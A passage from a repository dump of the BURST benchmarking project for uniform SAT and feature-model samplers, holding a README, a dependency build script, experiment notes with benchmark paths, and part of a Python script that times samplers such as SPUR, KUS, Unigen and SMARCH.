KUS https://github.com/meelgroup/KUS (new!)\n * SPUR https://github.com/ZaydH/spur (new!) 
\n * Unigen2 and QuickSampler https://github.com/diverse-project/samplingfm/\n * SMARCH https://github.com/jeho-oh/Kclause_Smarch/tree/master/Smarch (new!)\n * other: Unigen3, CMS, STS (new!)\nover different data:\n * https://github.com/diverse-project/samplingfm/ (including SAT formulas and hard feature models)\n * https://github.com/PettTo/Feature-Model-History-of-Linux (new!)\n\n### Pre-built Docker image \n\nWe recommend to use `macher/usampling:squashed` but other variants are possible (eg `macher/usampling:fmlinux` for a Docker image with th 5Gb dataset of Linux feature model)\nEverything is available here https://cloud.docker.com/repository/docker/macher/usampling\n\n### Requirements\n\n * Docker image with Python 3, pandas, numpy, setuptools, pycoSAT, anytree \n * solvers above and a proper installation \n * time and resources ;) \n\n\n\n## Architecture and extensibility \n\n### Organization of the repo \n\n * All samplers are in `samplers` directory (and all utilities/dependencies are also in this folder)\n * `usampling-experiments.py` pilots the scalability study of samplers over different datasets \n * `barbarik.py` pilots the uniformity checking of samplers over different datasets. It is based on the barbarik tool from Kuldeep Meel et al: https://github.com/meelgroup/barbarik. This version supports uniformity check for all the 10 solvers above and uses KUS as a reference uniform solver, if not specified in the command line above.\n * `barbarikloop.py` allows to run uniformity checks on set fo files (using the same flas technique as above) and report the results in a CSV file\n\n### Extensibility \n\nTo configure a new sampler to work with Barbarik, here are the basic steps in `barbarik.py` (see also comments in the script): \n\n * add a new number/enumeration eg `SAMPLER_XXX = 11`\n * expand the class `SolutionRetriver`. This is the class where solution obtained from samplers are fed to Barbarik. you need to: \n * 1. define a method `get_solution_from_XXX(*topass_withseed)` in this class. This method needs to parse the output of the sampler and create an internal representation fo the list of solutions. Each solution is a list of literals preceded by '-' if is not selected.\n * 2. Wrap the call at the beginning of the Class: if/elif blocks.\nNote that since all samplers have different output formats, most of the work consists of parsing the output to create a list of solutions in a format acceptable by Barbarik. This step can be very specific and ad-hoc; we provide facilities to ease the effort and integration. 
\n \n" }, { "alpha_fraction": 0.72947758436203, "alphanum_fraction": 0.7966417670249939, "avg_line_length": 28.83333396911621, "blob_id": "38733d10be9969ca5cb89ecdfd24da42668b5d44", "content_id": "c9da37d4c3fb658418bf6ff989bc64e228e0c02b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 536, "license_type": "permissive", "max_line_length": 92, "num_lines": 18, "path": "/samplers/splconqueror.sh", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "git clone https://github.com/maxcordy/SPLConqueror.git\ncd SPLConqueror\ngit submodule update --init --recursive\napt-get update\napt install mono-complete monodevelop\napt install nuget\ncd SPLConqueror/\nnuget restore\ncd SPLConqueror/\nxbuild SPLConqueror_Core.csproj\ncd ../MachineLearning\nxbuild MachineLearning.csproj\ncd ../CommandLine\nxbuild CommandLine.csproj\ncd bin/Debug\nwget https://github.com/Z3Prover/z3/releases/download/z3-4.8.7/z3-4.8.7-x64-ubuntu-16.04.zip\nunzip z3-4.8.7-x64-ubuntu-16.04.zip\ncp z3-4.8.7-x64-ubuntu-16.04/bin/* ." }, { "alpha_fraction": 0.7528606057167053, "alphanum_fraction": 0.8272817134857178, "avg_line_length": 791.8571166992188, "blob_id": "845434dc9983c318440276961b85b7d459ca8895", "content_id": "2d875def0089e0b6a546180470f4013e0d8f44fe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11099, "license_type": "permissive", "max_line_length": 10478, "num_lines": 14, "path": "/usampling-data/results-timeout180-IGRIDA/deprecated/README.md", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "deprecated since the set of formulas is a bit different from the rigorous reverse engineering process of TAPLAS, ICSE, etc. 
for identifying actual formulas used\nno problem: experiment made again\n\nexperiments with\n\n#OAR -l nodes=1/thread=16,walltime=12:00:00 \n#OAR -p virt='YES' AND cluster='armada'\n\nBENCH=\"/home/samplingfm/Benchmarks/V7/s349_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case146.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case145.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case132.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case135.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case109.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case145.cnf /home/samplingfm/Benchmarks/V3/s382_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case123.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case119.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case9.cnf /home/samplingfm/Benchmarks/V7/s382_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case61.cnf /home/samplingfm/Benchmarks/V15/s344_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case120.cnf /home/samplingfm/Benchmarks/V15/s349_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case57.cnf /home/samplingfm/Benchmarks/V3/s444_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case121.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case62.cnf /home/samplingfm/Benchmarks/V3/s420_3_2.cnf /home/samplingfm/Benchmarks/V3/s420_new1_3_2.cnf /home/samplingfm/Benchmarks/V3/s420_new_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case33.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case202.cnf /home/samplingfm/Benchmarks/V3/s510_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case126.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_3.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_3.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_3.cnf /home/samplingfm/Benchmarks/V7/s444_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_new1_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_new_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_7_4.cnf /home/samplingfm/Benchmarks/V7/s349_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case146.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case145.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case132.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case135.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case109.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case145.cnf /home/samplingfm/Benchmarks/V3/s382_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case123.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case119.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case9.cnf /home/samplingfm/Benchmarks/V7/s382_7_4.cnf 
/home/samplingfm/Benchmarks/Blasted_Real/blasted_case61.cnf /home/samplingfm/Benchmarks/V15/s344_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case120.cnf /home/samplingfm/Benchmarks/V15/s349_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case57.cnf /home/samplingfm/Benchmarks/V3/s444_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case121.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case62.cnf /home/samplingfm/Benchmarks/V3/s420_3_2.cnf /home/samplingfm/Benchmarks/V3/s420_new1_3_2.cnf /home/samplingfm/Benchmarks/V3/s420_new_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case33.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case202.cnf /home/samplingfm/Benchmarks/V3/s510_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case126.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_3.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_3.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_3.cnf /home/samplingfm/Benchmarks/V7/s444_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_new1_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_new_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case122.cnf /home/samplingfm/Benchmarks/V7/s510_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case60.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_0_b11_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b11_1.cnf /home/samplingfm/Benchmarks/V15/s510_15_7.cnf /home/samplingfm/Benchmarks/V15/s382_15_7.cnf /home/samplingfm/Benchmarks/V15/s420_new_15_7.cnf /home/samplingfm/Benchmarks/V3/s526_3_2.cnf /home/samplingfm/Benchmarks/V15/s420_15_7.cnf /home/samplingfm/Benchmarks/V15/s420_new1_15_7.cnf /home/samplingfm/Benchmarks/V3/s526a_3_2.cnf /home/samplingfm/Benchmarks/V15/s444_15_7.cnf /home/samplingfm/Benchmarks/V7/s526_7_4.cnf /home/samplingfm/Benchmarks/V7/s526a_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case125.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case35.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case34.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case143.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_0_b12_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b12_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b12_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case115.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case114.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case131.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case116.cnf /home/samplingfm/Benchmarks/V15/s526_15_7.cnf /home/samplingfm/Benchmarks/V15/s526a_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring51.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring50.cnf /home/samplingfm/Benchmarks/V3/s953a_3_2.cnf /home/samplingfm/Benchmarks/V7/s953a_7_4.cnf /home/samplingfm/Benchmarks/V15/s953a_15_7.cnf /home/samplingfm/Benchmarks/V7/s820a_7_4.cnf /home/samplingfm/Benchmarks/V7/s832a_7_4.cnf /home/samplingfm/Benchmarks/V15/s820a_15_7.cnf /home/samplingfm/Benchmarks/V3/s1238a_3_2.cnf /home/samplingfm/Benchmarks/V3/s1196a_3_2.cnf /home/samplingfm/Benchmarks/V15/s832a_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring24.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring22.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring20.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring21.cnf 
/home/samplingfm/Benchmarks/V7/s1238a_7_4.cnf /home/samplingfm/Benchmarks/V7/s1196a_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring23.cnf /home/samplingfm/Benchmarks/GuidanceService2.sk_2_27.cnf /home/samplingfm/Benchmarks/V15/s1238a_15_7.cnf /home/samplingfm/Benchmarks/V15/s1196a_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_0_b12_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b12_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b12_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring27.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring25.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring30.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring22.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring6.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring51.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring10.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring40.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring26.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring11.cnf /home/samplingfm/Benchmarks/GuidanceService2.sk_2_27.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring30.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring28.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring10.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring8.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring29.cnf /home/samplingfm/Benchmarks/IssueServiceImpl.sk_8_30.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring9.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring14.cnf /home/samplingfm/Benchmarks/ActivityService2.sk_10_27.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring12.cnf /home/samplingfm/Benchmarks/IterationService.sk_12_27.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring16.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring70.cnf /home/samplingfm/Benchmarks/PhaseService.sk_14_27.cnf /home/samplingfm/Benchmarks/V3/s27_new_3_2.cnf /home/samplingfm/Benchmarks/ActivityService2.sk_10_27.cnf /home/samplingfm/Benchmarks/IterationService.sk_12_27.cnf /home/samplingfm/Benchmarks/ActivityService2.sk_10_27.cnf /home/samplingfm/Benchmarks/111.sk_2_36.cnf /home/samplingfm/Benchmarks/ConcreteActivityService.sk_13_28.cnf /home/samplingfm/Benchmarks/V3/s5378a_3_2.cnf /home/samplingfm/Benchmarks/partition.sk_22_155.cnf /home/samplingfm/Benchmarks/ProjectService3.sk_12_55.cnf /home/samplingfm/Benchmarks/NotificationServiceImpl2.sk_10_36.cnf /home/samplingfm/Benchmarks/109.sk_4_36.cnf /home/samplingfm/Benchmarks/81.sk_5_51.cnf /home/samplingfm/Benchmarks/FMEasy/2.6.32-2var.cnf /home/samplingfm/Benchmarks/70.sk_3_40.cnf /home/samplingfm/Benchmarks/ProcessBean.sk_8_64.cnf /home/samplingfm/Benchmarks/FeatureModels/sam7ex256.cnf /home/samplingfm/Benchmarks/V3/s35932_3_2.cnf /home/samplingfm/Benchmarks/80.sk_2_48.cnf /home/samplingfm/Benchmarks/IterationService.sk_12_27.cnf /home/samplingfm/Benchmarks/doublyLinkedList.sk_8_37.cnf /home/samplingfm/Benchmarks/V3/s1196a_3_2.cnf /home/samplingfm/Benchmarks/LoginService.sk_20_34.cnf /home/samplingfm/Benchmarks/29.sk_3_45.cnf /home/samplingfm/Benchmarks/17.sk_3_45.cnf /home/samplingfm/Benchmarks/isolateRightmost.sk_7_481.cnf /home/samplingfm/Benchmarks/LoginService2.sk_23_36.cnf /home/samplingfm/Benchmarks/36.sk_3_77.cnf /home/samplingfm/Benchmarks/signedAvg.sk_8_1020.cnf 
/home/samplingfm/Benchmarks/enqueueSeqSK.sk_10_42.cnf /home/samplingfm/Benchmarks/tutorial3.sk_4_31.cnf\" \n\nVM_CMD=\"docker run -v /mnt/srv/tempdd/macher/usampling-exp/:/home/usampling-exp:z macher/usampling:squashed /bin/bash -c 'cd /home/usampling-exp/; echo STARTING; python3 usampling-experiments.py --smarch -t 180 -flas $BENCH FeatureModels FMEasy; echo END'\"\n\n(6 samplers)\nthere is also the log for SMARCH (can be useful)" }, { "alpha_fraction": 0.5835053324699402, "alphanum_fraction": 0.5931860208511353, "avg_line_length": 43.4183349609375, "blob_id": "a5613c24cbe2027010724252aee173f93695977f", "content_id": "f57cbc95e9d94c33af9c7a4f78f582409d304300", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26651, "license_type": "permissive", "max_line_length": 317, "num_lines": 600, "path": "/usampling-experiments.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "from os import listdir, chdir\nfrom os.path import isfile, join\nimport subprocess\nfrom subprocess import STDOUT, check_output, TimeoutExpired, CalledProcessError\nimport pandas as pd\nimport numpy as np\nimport time\nimport re\nimport sys\nfrom statistics import mean\nimport threading\nimport multiprocessing\nimport queue\nimport os\nimport signal\nimport shlex\nfrom subprocess import Popen, PIPE\nfrom threading import Timer\n\nimport argparse\nimport tempfile\n\nprint('loading packages...')\n\nFM_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/FeatureModels/\"\nFM2_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/FMEasy/\"\nFLA_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/\"\nFLABLASTED_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/Blasted_Real/\"\nFLAV7_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V7/\"\nFLAV3_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V3/\"\nFLAV15_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V15/\"\n\nFMLINUX_DATASET_FOLDER=\"/home/fm_history_linux_dimacs/\"\n\n\n### execution_time_in is measurement within Python\n### we may have other/intermediate measures as well\n\ndef run_with_timeout(cmd, timeout_sec, cwd=None):\n proc = Popen(shlex.split(cmd), stdout=PIPE, stderr=PIPE, cwd=cwd)\n timer = Timer(timeout_sec, proc.kill)\n try:\n timer.start()\n s = proc.wait()\n if (s == 0):\n stdout, stderr = proc.communicate() # proc.stdout, proc.stderr #\n return stdout, stderr\n else:\n return None, None\n finally:\n timer.cancel()\n\ndef partial_output(proc,outq):\n \n for l in iter(proc.stdout.readline,b''):\n outq.put(l.decode('utf-8')) \n return\n\n\ndef run_with_timeout_partial(cmd, timeout_sec, cwd=None):\n \n proc= Popen(shlex.split(cmd), stdout=PIPE, stderr=PIPE, cwd=cwd,preexec_fn=os.setsid)\n output = '' \n outq = multiprocessing.Queue() \n d = multiprocessing.Process(target=partial_output,args=(proc,outq))\n d.start()\n try:\n print('Starting the smarch command') \n proc.wait(timeout=timeout_sec)\n d.terminate()\n d.join()\n while True: \n try:\n elem = outq.get(block=False)\n #print('line: '+ elem)\n output=output + elem\n except queue.Empty:\n #print('Queue empty...')\n break\n \n outq.close()\n return output, proc.stderr, False\n \n except TimeoutExpired:\n print('TIMEOUT REACHED')\n d.terminate()\n d.join()\n while True: \n try:\n elem = outq.get(block=False)\n #line = outq.get()\n #print('t_line: '+ elem)\n output=output + elem\n except queue.Empty:\n #print('t_Queue empty...')\n break \n \n outq.close()\n os.killpg(os.getpgid(proc.pid),signal.SIGTERM) \n return output, proc.stderr, True\n except 
KeyboardInterrupt:\n print('Program interrupted by the user...')\n d.terminate()\n d.join()\n outq.close()\n os.killpg(os.getpgid(proc.pid),signal.SIGTERM) \n os.kill(os.getpid(),signal.SIGTERM) \n \ndef mk_spur_cmd(nsamples):\n return \"./samplers/spur -s \" + str(nsamples) + \" -cnf\" # + \" -t \" + str(TIMEOUT)\n# return \"/home/spur/build/Release/spur -s \" + str(nsamples) + \" -cnf\" # + \" -t \" + str(TIMEOUT)\n\ndef experiment_SPUR(flas, timeout, nsamples, savecsv_onthefly=None):\n\n exp_results = pd.DataFrame()\n for fla in flas:\n full_cmd = mk_spur_cmd(nsamples) + \" \" + fla\n #print(\"calling \", full_cmd.split(\" \"))\n #subprocess.call(full_cmd, shell=True)\n\n try:\n start = time.time()\n output = check_output(full_cmd.split(\" \"), stderr=STDOUT, timeout=timeout, encoding='UTF-8') #, shell=True not recommended # https://stackoverflow.com/questions/36952245/subprocess-timeout-failure\n end = time.time()\n etime = end - start\n\n #### extracting information between start header and end header\n i = 0\n start_indice = -1\n end_indice = -1\n for o in output.splitlines():\n if \"#START_HEADER\" in o:\n start_indice = i\n if \"#END_HEADER\" in o:\n end_indice = i\n i = i + 1\n if (not (start_indice is -1 and end_indice is -1)):\n expe_infos = output.splitlines()[start_indice+1:end_indice]\n dict_exp = {}\n for exp in expe_infos:\n if 'num_second_pass_vars' in exp:\n continue\n e = exp.split(\",\")\n if not len(e) is 2:\n print(\"Error in parsing header and expe information\", exp)\n key = exp\n val = np.NaN\n else:\n key = e[0]\n val = e[1]\n #print(key, \"=>\", val)\n #df_exp[key] = val\n dict_exp.update({key : [val]})\n dict_exp.update({'timeout' : [False]})\n dict_exp.update({'execution_time_in' : [etime]})\n df_exp = pd.DataFrame(dict_exp, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n except TimeoutExpired:\n df_exp = pd.DataFrame({'formula_file' : [fla], 'execution_time_in': [timeout], 'timeout' : [True]}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n #print(\"Timeout\")\n continue\n # print(\"DONE\")\n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n return exp_results\n\n\ndef extract_pattern(dpattern, ostr):\n if (dpattern in ostr):\n d = ostr.split(dpattern, 1)[-1]\n if (d and len(d) > 0):\n return d.strip()\n return None\n\n# assuming that we are executing it in samplers folder!\ndef mk_kus_cmd(nsamples):\n return \"python3 KUS.py --samples \" + str(nsamples)\n # return \"python3 ./samplers/KUS.py --samples \" + str(nsamples)\n # return \"python3 /home/KUS/KUS.py --samples \" + str(nsamples)\n\ndef experiment_KUS(flas, timeout, nsamples, savecsv_onthefly=None):\n\n exp_results = pd.DataFrame()\n for fla in flas:\n\n full_cmd_kus = mk_kus_cmd(nsamples) + \" \" + fla\n # full_cmd_kus = '/home/samplingfm/scripts/doalarm -t real 10 ' + full_cmd_kus\n print(full_cmd_kus)\n #print(\"calling \", full_cmd.split(\" \"))\n #subprocess.call(full_cmd, shell=True)\n\n try:\n # output = check_output(full_cmd_kus.split(\" \"), stderr=STDOUT, timeout=TIMEOUT, encoding='UTF-8', cwd='/home/KUS/') #, shell=True not recommended # https://stackoverflow.com/questions/36952245/subprocess-timeout-failure\n # cwd = os.getcwd()\n # os.chdir(str(os.getcwd()) + '/samplers') # position the execution \n start = time.time()\n # output = check_output(full_cmd_kus.split(\" \"), timeout=TIMEOUT, cwd='/home/KUS/')\n # proc = subprocess.run(full_cmd_kus.split(\" \"), 
timeout=TIMEOUT, cwd='/home/KUS/') # capture_output=True leads to blocking https://stackoverflow.com/questions/1191374/using-module-subprocess-with-timeout https://www.blog.pythonlibrary.org/2016/05/17/python-101-how-to-timeout-a-subprocess/\n # op, err = run_with_timeout(full_cmd_kus, timeout, cwd='/home/KUS')\n op, err = run_with_timeout(full_cmd_kus, timeout, cwd=str(os.getcwd()) + '/samplers') # execute the command in this folder (otherwise DNNF does not work)\n # op, err = run_with_timeout(full_cmd_kus, timeout, cwd=str(os.getcwd())) # execute the command in this folder (otherwise DNNF does not work)\n end = time.time()\n etime = end - start\n # os.chdir(str(cwd)) # getting back\n if (op is None): # timeout!\n print(\"TIMEOUT\")\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : True, 'execution_time_in': timeout}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n else:\n output = op.decode(\"utf-8\")\n\n\n #Time taken for dDNNF compilation: 5.967377424240112\n #Time taken to parse the nnf text: 0.05161333084106445\n #Time taken for Model Counting: 0.04374361038208008\n #Model Count: 536870912\n #Time taken by sampling: 0.1852860450744629\n dnnf_time = None\n dnnfparsing_time = None\n counting_time = None\n model_count = None\n sampling_time = None\n for o in output.splitlines():\n if dnnf_time is None:\n dnnf_time = extract_pattern('Time taken for dDNNF compilation:', o)\n if dnnfparsing_time is None:\n dnnfparsing_time = extract_pattern('Time taken to parse the nnf text:', o)\n if counting_time is None:\n counting_time = extract_pattern('Time taken for Model Counting:', o)\n if model_count is None:\n model_count = extract_pattern('Model Count:', o)\n if (sampling_time is None):\n sampling_time = extract_pattern('Time taken by sampling:', o)\n\n\n #### TODO: KUS may fail after DNNF\n\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : False, 'execution_time_in': etime, 'dnnf_time' : dnnf_time, 'sampling_time': sampling_time, 'model_count': model_count, 'counting_time' : counting_time, 'dnnfparsing_time' : dnnfparsing_time}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n\n #df_exp = pd.DataFrame({'formula_file' : [fla], 'execution_time_in': etime, 'timeout' : [False]}, index=[0])\n #exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n print(\"DONE\")\n except CalledProcessError:\n print(\"CalledProcessError error\")\n continue\n except Exception as er:\n print(\"OOOPS (unknown exception)\", er)\n continue \n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n\n return exp_results\n\n\ndef mk_unigen2_cmd(nsamples):\n return \"python3 UniGen2.py -samples=\" + str(nsamples) # assume that it is executed in samplers folder\n\ndef experiment_Unigen2(flas, timeout, nsamples, savecsv_onthefly=None):\n\n exp_results = pd.DataFrame()\n for fla in flas:\n\n full_cmd_unigen2 = mk_unigen2_cmd(nsamples) + \" \" + fla + ' ' + tempfile.gettempdir()\n print(full_cmd_unigen2)\n\n try:\n start = time.time()\n op, err = run_with_timeout(full_cmd_unigen2, timeout, cwd=str(os.getcwd()) + '/samplers') \n end = time.time()\n etime = end - start\n if (op is None): # timeout!\n print(\"TIMEOUT\")\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : True, 'execution_time_in': timeout}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n else:\n output = op.decode(\"utf-8\")\n df_exp = pd.DataFrame({'formula_file' : 
fla, 'timeout' : False, 'execution_time_in': etime}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n print(\"DONE\")\n except CalledProcessError:\n print(\"CalledProcessError error\")\n continue\n except Exception as er:\n print(\"OOOPS (unknown exception)\", er)\n continue \n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n\n return exp_results\n\n\ndef mk_unigen3_cmd(nsamples): \n return \"./samplers/approxmc3 -s 42 -v 0 --samples \" + str(nsamples) # TODO: parameterize seed?\n\n\ndef experiment_Unigen3(flas, timeout, nsamples, savecsv_onthefly=None):\n\n exp_results = pd.DataFrame()\n for fla in flas:\n full_cmd_unigen3 = mk_unigen3_cmd(nsamples) + \" \" + fla\n print(full_cmd_unigen3)\n try:\n start = time.time()\n # op, err = run_with_timeout(full_cmd_unigen3, timeout, cwd=str(os.getcwd()) + '/samplers')\n output = check_output(full_cmd_unigen3.split(\" \"), stderr=STDOUT, timeout=timeout, encoding='UTF-8')\n print(\"still alive (TODO!)\", output)\n \n except TimeoutExpired:\n df_exp = pd.DataFrame({'formula_file' : [fla], 'execution_time_in': [timeout], 'timeout' : [True]}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n print(\"Timeout\") \n continue\n except subprocess.CalledProcessError as e:\n # seems unavoidable and actually the normal case\n # print(e.returncode)\n # print(e.cmd)\n # print(e.output) \n\n end = time.time()\n etime = end - start\n # os.chdir(str(cwd)) # getting back\n\n # if (op is None): # timeout!\n # print(\"TIMEOUT\")\n # df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : True, 'execution_time_in': timeout}, index=[0])\n # exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n # else:\n # output = op.decode(\"utf-8\") \n # nsolutions = None\n # for o in output.splitlines():\n # if nsolutions is None:\n # nsolutions = extract_pattern(\"Number of solutions is\", output) \n \n\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : False, 'execution_time_in': etime }, index=[0]) # , 'nsolutions': nsolutions})\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n\n print(\"DONE\")\n\n continue\n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n\n return exp_results\n\n\n\n\n\n\n\n\n\n\n\ndef mk_cmd_smarch(nsamples,pthreads,mp=False):\n if mp:\n return \"python3 ./samplers/smarch_mp.py -p \" + str(pthreads)\n # return \"python3 smarch_mp.py -p \" + str(pthreads)\n else: \n return \"python3 ./samplers/smarch.py\"\n # return \"python3 smarch.py\"\n\ndef experiment_SMARCH(flas, timeout, nsamples, pthreads, savecsv_onthefly=None,mp=False):\n SMARCH_OUTPUT_DIR='./smarch_samples'\n exp_results = pd.DataFrame() \n for fla in flas:\n full_cmd_smarch = mk_cmd_smarch(nsamples,pthreads,mp) + \" -o \" + SMARCH_OUTPUT_DIR + \" \" + fla + \" \" + str(nsamples) \n print(full_cmd_smarch)\n\n 